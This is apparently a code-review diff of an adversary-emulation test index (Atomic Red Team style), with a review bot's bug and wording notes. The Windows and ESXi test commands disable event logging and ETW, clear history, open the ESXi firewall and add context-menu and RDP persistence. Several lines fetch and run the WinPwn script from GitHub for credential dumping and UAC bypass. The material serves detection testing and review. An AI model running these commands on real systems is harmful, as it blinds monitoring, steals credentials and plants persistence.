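Review bot: the prereq_command in this hunk can never succeed: the string handed to Test-Path is `"Test-Path C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"`, i.e. the literal text `Test-Path ` has been folded into the path, so the check always exits 1 and the MSI is re-downloaded and re-installed on every run. It should read `if (Test-Path "C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe") {exit 0} else {exit 1}`. Separately, `New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory` in get_prereq_command throws if the directory already exists; `-Force` or `-ErrorAction Ignore` keeps a rerun quiet.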
@@ -6141,6 +6168,21 @@ defense-evasion:
'
name: powershell
- name: Clear PowerShell Session History
auto_generated_guid: 22c779cd-9445-4d3e-a136-f75adbf0315f
description: "This technique involves using the Clear-History cmdlet in PowerShell
to remove all records of previously executed commands.\nThis action is often
performed by attackers to eliminate traces of their activities, making incident
detection and forensic \ninvestigation more challenging. By clearing the session
history, adversaries aim to obfuscate their operational footprint.\n"
supported_platforms:
- windows
executor:
command: 'Clear-History
'
name: powershell
elevation_required: false
T1202:
technique:
modified: '2024-10-03T14:47:17.154Z'
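Review bot: the description overstates what the executor does. `Clear-History` clears only the current session's in-memory command history; with PSReadLine loaded the persisted history file on disk is untouched, so "remove all records of previously executed commands" should be narrowed to the session history (the test name already says "Session History"). There is also a stray `\n` inside `forensic \ninvestigation` that splits a sentence mid-line in the rendered docs.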
@@ -6283,7 +6325,7 @@ defense-evasion:
default: C:\Windows\System32\calc.exe
executor:
command: Scriptrunner.exe -appvscript "#{payload_path}"
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
- name: Indirect Command Execution - RunMRU Dialog
@@ -8338,7 +8380,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
mimiload -consoleoutput -noninteractive
name: powershell
@@ -8964,6 +9005,66 @@ defense-evasion:
'
name: command_prompt
- name: Modify Event Log Channel Access Permissions via Registry - PowerShell
auto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
ChannelPath:
type: string
default: HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TaskScheduler/Operational
description: Path to the event log service channel to alter
executor:
command: "Set-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value
\"O:SYG:SYD:(D;;0x1;;;WD)\"\nRestart-Service -Name EventLog -Force -ErrorAction
Ignore "
cleanup_command: |-
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
auto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
ChannelPath:
type: string
default: HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\Setup
description: Path to the event log service channel to alter
executor:
command: |-
New-Item -Path #{ChannelPath} -Force
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
cleanup_command: |-
Remove-Item -Path #{ChannelPath} -Force
Restart-Service -Name EventLog -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Modify Event Log Access Permissions via Registry - PowerShell
auto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
CustomSDPath:
type: string
default: HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\System
description: Path to the event log service channel to alter
executor:
command: 'Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"'
cleanup_command: 'Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"'
name: powershell
elevation_required: true
T1218.002:
technique:
x_mitre_platforms:
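Review bot: the cleanup_command of the first test restores a hard-coded SDDL string rather than whatever `ChannelAccess` held before the test, so on any host whose channel permissions differ from that value the cleanup leaves the channel in a state the operator did not start with; read the existing value with Get-ItemProperty before the Set-ItemProperty and restore that. The second test has the inverse problem: `Remove-Item -Path #{ChannelPath} -Force` deletes the whole `...\Policies\Microsoft\Windows\EventLog\Setup` key, including any values that existed before `New-Item -Force` ran. All three descriptions should also read "an event log channel" rather than "a event log channel".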
@@ -9490,6 +9591,53 @@ defense-evasion:
cleanup_command: Remove-NetFirewallRule -DisplayName "New rule"
name: powershell
elevation_required: true
- name: ESXi - Set Firewall to PASS Traffic
auto_generated_guid: a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d
description: 'This test sets the default ESXi firewall action to PASS instead
of DROP. This allows all incoming and outgoing traffic.
'
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'The plink executable must be found in the ExternalPayloads folder.
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "esxcli network firewall set --default-action true"
'
cleanup_command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "esxcli network firewall set --default-action false"
'
name: command_prompt
elevation_required: false
T1553.003:
technique:
x_mitre_platforms:
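Review bot: with `-batch`, plink abandons the connection instead of prompting when the ESXi host key is not already in its cache, so on a fresh runner both the executor and the cleanup_command fail silently (the `echo "" |` does not help with that). Either document that the host key must be cached before running, or pass `-hostkey` with the expected fingerprint as an input argument. The cleanup restores `--default-action false` unconditionally, which is fine only if DROP was the starting state; the description should say so.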
@@ -13848,6 +13996,63 @@ defense-evasion:
'
name: powershell
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry
- Cmd
auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
environment variable to 0 in the HKCU registry using the reg.exe utility.
In order for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul
2>&1
name: command_prompt
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry
- PowerShell
auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
environment variable to 0 in the HKCU registry using PowerShell. In order
for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
-Value 0 -PropertyType "String" -Force
cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
name: powershell
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry
- Cmd
auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
environment variable to 0 in the HKLM registry using the reg.exe utility.
In order for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"
/v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session
Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry
- PowerShell
auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
environment variable to 0 in the HKLM registry using PowerShell. In order
for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session
Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String"
-Force
cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session
Manager\Environment" -Name COMPlus_ETWEnabled
name: powershell
elevation_required: true
T1562.007:
technique:
modified: '2024-10-16T19:38:57.374Z'
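Review bot: the two HKCU tests omit `elevation_required` while the HKLM ones set it to true; add `elevation_required: false` explicitly for parity so the runner's intent is unambiguous. The PowerShell cleanup_commands call Remove-ItemProperty without `-ErrorAction Ignore`, so if the value was never created (or was already removed) the cleanup throws, whereas the cmd versions already swallow that case with `> nul 2>&1`. Descriptions: "In order for changes to take effect a logout might be required" would be clearer as "a new logon session is required for the variable to be picked up", since processes already running keep their environment.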
@@ -14216,7 +14421,7 @@ defense-evasion:
description: Ticket file name usually format of 'id-username\@domain.kirbi'
(e.g. can be dumped by "sekurlsa::tickets /export" module)
type: string
default:
default:
mimikatz_exe:
description: Path of the Mimikatz binary
type: path
@@ -14782,6 +14987,7 @@ defense-evasion:
Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
Stop-process -name "hello" -Force -ErrorAction ignore
name: powershell
elevation_required: true
- name: Remove the Zone.Identifier alternate data stream
auto_generated_guid: 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9
description: |
@@ -18271,8 +18477,7 @@ defense-evasion:
supported_platforms:
- windows
executor:
command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
-consoleoutput -noninteractive "
name: powershell
- name: Tamper with Windows Defender ATP using Aliases - PowerShell
@@ -18725,6 +18930,81 @@ defense-evasion:
'
name: powershell
elevation_required: true
- name: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
auto_generated_guid: 653c6e17-14a2-4849-851d-f1c0cc8ea9ab
description: This atomic simulates an activity where an attacker disables the
EventLog-Application ETW Auto Logger session using the reg.exe utility to
update the Windows registry value "Start". This would effectivly disable the
Event log application channel. The changes would only take effect after a
restart.
supported_platforms:
- windows
executor:
command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
/v "Start" /t REG_DWORD /d "0" /f
cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
/v "Start" /t REG_DWORD /d "1" /f
name: command_prompt
elevation_required: true
- name: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
auto_generated_guid: da86f239-9bd3-4e85-92ed-4a94ef111a1c
description: This atomic simulates an activity where an attacker disables the
EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty"
cmdlet to update the Windows registry value "Start". This would effectivly
disable the Event log application channel. The changes would only take effect
after a restart.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
-Name Start -Value 0 -PropertyType "DWord" -Force
cleanup_command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
-Name Start -Value 1 -PropertyType "DWord" -Force
name: powershell
elevation_required: true
- name: Disable EventLog-Application ETW Provider Via Registry - Cmd
auto_generated_guid: 1cac9b54-810e-495c-8aac-989e0076583b
description: This atomic simulates an activity where an attacker disables a
specific ETW provider from the EventLog-Application ETW Auto Logger session
using the reg.exe utility to update the Windows registry value "Enabled".
This would effectivly remove that provider from the session and cause to not
emit any logs of that type. The changes would only take effect after a restart.
supported_platforms:
- windows
input_arguments:
ETWProviderGUID:
type: string
default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
description: Microsoft-Windows-SenseIR ETW Provider GUID
executor:
command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
/v "Enabled" /t REG_DWORD /d "0" /f
cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
/v "Enabled" /t REG_DWORD /d "1" /f
name: command_prompt
elevation_required: true
- name: Disable EventLog-Application ETW Provider Via Registry - PowerShell
auto_generated_guid: 8f907648-1ebf-4276-b0f0-e2678ca474f0
description: This atomic simulates an activity where an attacker disables a
specific ETW provider from the EventLog-Application ETW Auto Logger session
using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry
value "Enabled". This would effectivly remove that provider from the session
and cause to not emit any logs of that type. The changes would only take effect
after a restart.
supported_platforms:
- windows
input_arguments:
ETWProviderGUID:
type: string
default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
description: Microsoft-Windows-SenseIR ETW Provider GUID
executor:
command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
-Name Enabled -Value 0 -PropertyType "DWord" -Force
cleanup_command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
-Name Enabled -Value 1 -PropertyType "DWord" -Force
name: powershell
elevation_required: true
T1601:
technique:
x_mitre_platforms:
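Review bot: in the two provider tests, `reg add` and `New-ItemProperty -Force` on `...\EventLog-Application\#{ETWProviderGUID}` create the GUID subkey when it does not exist on the host, which registers a new provider in the autologger session rather than disabling an existing one; the cleanup then sets `Enabled` to 1 and leaves that stray subkey behind. Check for the subkey first and have the cleanup remove it when the test created it. Also "effectivly" (four occurrences) should be "effectively", and "cause to not emit any logs of that type" reads better as "cause it to stop emitting logs of that type".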
@@ -26760,7 +27040,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
@@ -26772,7 +27051,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
@@ -29140,7 +29418,6 @@ privilege-escalation:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
name: powershell
@@ -29151,7 +29428,6 @@ privilege-escalation:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
name: powershell
@@ -29162,7 +29438,6 @@ privilege-escalation:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
name: powershell
@@ -36650,11 +36925,11 @@ privilege-escalation:
default: calc
executor:
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
/v StartupPrograms /t REG_SZ /d "#{malicious_app}"
/f /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
'
cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
/v StartupPrograms /t REG_SZ /d "rdpclip"
/f /v StartupPrograms /t REG_SZ /d "rdpclip"
name: command_prompt
elevation_required: true
- name: Creating Boot Verification Program Key for application execution during
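Review bot: adding `/f` is the right fix here: without it `reg add` prompts "Value StartupPrograms exists, overwrite (Yes/No)?" whenever the value is already present, which is always the case given that `rdpclip` is the value the cleanup restores, so the command blocked in non-interactive execution. The same change is duplicated in the persistence copy of this index further down; confirm both were regenerated together.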
@@ -36676,6 +36951,21 @@ privilege-escalation:
'
cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram
/f
name: command_prompt
elevation_required: true
- name: Add persistence via Windows Context Menu
auto_generated_guid: de47f4a0-2acb-416d-9a6b-cee584a4c4d1
description: |
This atomic test add persistence taking advantage of the Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/)
User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify).
supported_platforms:
- windows
executor:
command: reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command"
/ve /t REG_SZ /d "C:\Windows\System32\calc.exe" /f
cleanup_command: reg delete "HKEY_CLASSES_ROOT\Directory\Background\shell\Size
Modify" /f
name: command_prompt
elevation_required: true
T1098:
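Review bot: the description needs a grammar pass ("This atomic test adds persistence by taking advantage of the Windows Context Menu", "The user has to right-click on the desktop or in the white space of an open folder") and should state that the payload only runs when the new "Size Modify" entry is clicked, since the test itself only creates the key. Writes to HKEY_CLASSES_ROOT land in HKLM\Software\Classes unless the key already exists under HKCU\Software\Classes, so with `elevation_required: true` this is a machine-wide change; worth saying in the description. The same block is duplicated in the persistence section below.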
@@ -41870,7 +42160,6 @@ privilege-escalation:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
@@ -41882,7 +42171,6 @@ privilege-escalation:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
@@ -43894,7 +44182,7 @@ execution:
'
type: url
default:
default:
c2_parent_directory:
description: |
Parent directory where you have the "malicious" file on c2_domain server.
@@ -44462,7 +44750,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -44514,7 +44802,49 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
identifier: T1059.010
atomic_tests:
- name: AutoHotKey script execution
auto_generated_guid: 7b5d350e-f758-43cc-a761-8e3f6b052a03
description: 'An adversary may attempt to execute malicious script using AutoHotKey
software instead of regular terminal like powershell or cmd. A messagebox
will be displayed and calculator will popup when the script is executed successfully
'
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'AutoHotKey executable file must exist on disk at the specified
location (#{autohotkey_path})
'
prereq_command: |
if(Test-Path "#{autohotkey_path}") {
exit 0
} else {
exit 1
}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$AutoHotKeyURL = "https://www.autohotkey.com/download/ahk.zip"
$InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads"
Invoke-WebRequest -Uri $AutoHotKeyURL -OutFile $InstallerPath\ahk.zip
Expand-Archive -Path $InstallerPath -Force;
input_arguments:
script_path:
description: AutoHotKey Script Path
type: path
default: PathToAtomicsFolder\T1059.010\src\calc.ahk
autohotkey_path:
description: AutoHotKey Executable File Path
type: path
default: "$PathToAtomicsFolder\\..\\ExternalPayloads\\ahk\\AutoHotKeyU64.exe"
executor:
command: 'Start-Process -FilePath "#{autohotkey_path}" -ArgumentList "#{script_path}"
'
name: powershell
T1059.009:
technique:
modified: '2024-10-15T15:44:20.143Z'
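Review bot: `Expand-Archive -Path $InstallerPath -Force` in get_prereq_command passes the ExternalPayloads directory rather than the archive, so it fails, and without `-DestinationPath` the files would not land where the default `autohotkey_path` expects them (`...\ExternalPayloads\ahk\AutoHotKeyU64.exe`). It should be `Expand-Archive -Path "$InstallerPath\ahk.zip" -DestinationPath "$InstallerPath\ahk" -Force`. The test also has no cleanup_command, so the calculator and message box the description promises are left running; a Stop-Process on the spawned processes would close the loop. Minor: "execute malicious script using AutoHotKey software instead of regular terminal like powershell or cmd" reads better as "execute a malicious script through the AutoHotKey interpreter instead of a regular interpreter such as PowerShell or cmd".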
@@ -46889,6 +47219,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1651
atomic_tests: []
T1059.005:
technique:
@@ -47167,6 +47498,7 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1648
atomic_tests: []
T1204.001:
technique:
@@ -51601,7 +51933,7 @@ persistence:
$chromium = "https://commondatastorage.googleapis.com/chromium-browser-snapshots/Win_x64/1153778/chrome-win.zip"
# uBlock Origin Lite to test side-loading
$extension = "https://github.com/gorhill/uBlock/releases/download/uBOLite_0.1.23.6055/uBOLite_0.1.23.6055.chromium.mv3.zip"
$extension = "https://github.com/uBlockOrigin/uBOL-home/releases/download/uBOLite_2024.11.25.1376/uBOLite_2024.11.25.1376.chromium.mv3.zip"
Set-Location "#{working_dir}"
@@ -56316,11 +56648,11 @@ persistence:
default: calc
executor:
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
/v StartupPrograms /t REG_SZ /d "#{malicious_app}"
/f /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
'
cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
/v StartupPrograms /t REG_SZ /d "rdpclip"
/f /v StartupPrograms /t REG_SZ /d "rdpclip"
name: command_prompt
elevation_required: true
- name: Creating Boot Verification Program Key for application execution during
@@ -56342,6 +56674,21 @@ persistence:
'
cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram
/f
name: command_prompt
elevation_required: true
- name: Add persistence via Windows Context Menu
auto_generated_guid: de47f4a0-2acb-416d-9a6b-cee584a4c4d1
description: |
This atomic test add persistence taking advantage of the Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/)
User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify).
supported_platforms:
- windows
executor:
command: reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command"
/ve /t REG_SZ /d "C:\Windows\System32\calc.exe" /f
cleanup_command: reg delete "HKEY_CLASSES_ROOT\Directory\Background\shell\Size
Modify" /f
name: command_prompt
elevation_required: true
T1136.003:
@@ -61783,7 +62130,6 @@ persistence:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
@@ -61795,7 +62141,6 @@ persistence:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
@@ -63109,7 +63454,7 @@ command-and-control:
MSP360_Download_Url:
description: URL to download MSP360 Connect from
type: url
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'MSP360 must exist at (#{MSP360_Connect_Path})
@@ -63213,6 +63558,17 @@ command-and-control:
Remote\Server\#{srserver_exe}"
name: powershell
elevation_required: true
- name: Microsoft App Quick Assist Execution
auto_generated_guid: 1aea6d15-70f1-4b4e-8b02-397b5d5ffe75
description: "An adversary may attempt to trick a user into executing Microsoft
Quick Assist Microsoft Store app and connect to the user's machine. \n"
supported_platforms:
- windows
executor:
command: Start-Process "shell:AppsFolder\MicrosoftCorporationII.QuickAssist_8wekyb3d8bbwe!App"
cleanup_command: Stop-Process -Name quickassist
name: powershell
elevation_required: true
T1659:
technique:
modified: '2023-10-01T02:28:45.147Z'
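Review bot: `elevation_required: true` looks unnecessary here; launching a Store app via `shell:AppsFolder\...!App` works from a standard user session, and running elevated masks the realistic case the description describes (a tricked, non-admin user). The cleanup `Stop-Process -Name quickassist` throws when the app did not start or was already closed; `-ErrorAction Ignore` keeps the cleanup quiet.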
@@ -66481,9 +66837,12 @@ command-and-control:
{exit 0}
}
get_prereq_command: "Write-Output \"Generating random passwords and saving
to file...\"\n$passwords = 1..10 | ForEach-Object { Get-Random -InputObject
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?')
-Count 12 }\n$passwords | Out-File -FilePath \"#{passwords_file}\" \n"
to file...\"\n$passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object
{ @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')
+ @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z')
+ @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?')
| Get-Random }) }\n$passwords | Out-File -FilePath \"#{passwords_file}\"
\ \n"
- description: "Tarz file to embed in image must exist \n"
prereq_command: |
if (!(Test-Path "#{tar_file}")) {exit 1} else {
